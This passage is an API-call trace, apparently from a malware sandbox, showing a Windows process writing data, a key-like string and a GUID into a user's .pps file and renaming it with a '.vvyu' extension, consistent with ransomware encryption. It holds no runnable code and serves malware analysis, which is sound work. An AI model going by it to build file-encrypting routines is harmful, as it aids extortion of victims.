returned 0x2ea3788 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.033] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3728 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.036] GetCurrentThreadId () returned 0x66c [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9828 [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.037] GetCurrentThreadId () returned 0x66c [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x66c990 [0203.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x66c990 | out: hHeap=0x620000) returned 1 [0203.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0203.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0203.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0203.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0203.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1de0 | out: hHeap=0x620000) returned 1 [0203.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0203.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.048] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x5ee7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x5ee7, lpOverlapped=0x0) returned 1 [0203.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.049] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x5eec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.049] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.050] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.051] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.051] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.051] CloseHandle (hObject=0x510) returned 1 [0203.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5e50 [0203.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0203.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.054] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\kyLqCYn6yV.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\kylqcyn6yv.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\kyLqCYn6yV.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\kylqcyn6yv.pps.vvyu")) returned 1 [0203.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.056] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.059] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6612ed0, ftCreationTime.dwHighDateTime=0x1d89f97, ftLastAccessTime.dwLowDateTime=0x417a65d0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x417a65d0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x5eec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyLqCYn6yV.pps", cAlternateFileName="KYLQCY~1.PPS")) returned 0 [0203.059] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0203.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.060] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0203.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0203.060] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0203.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 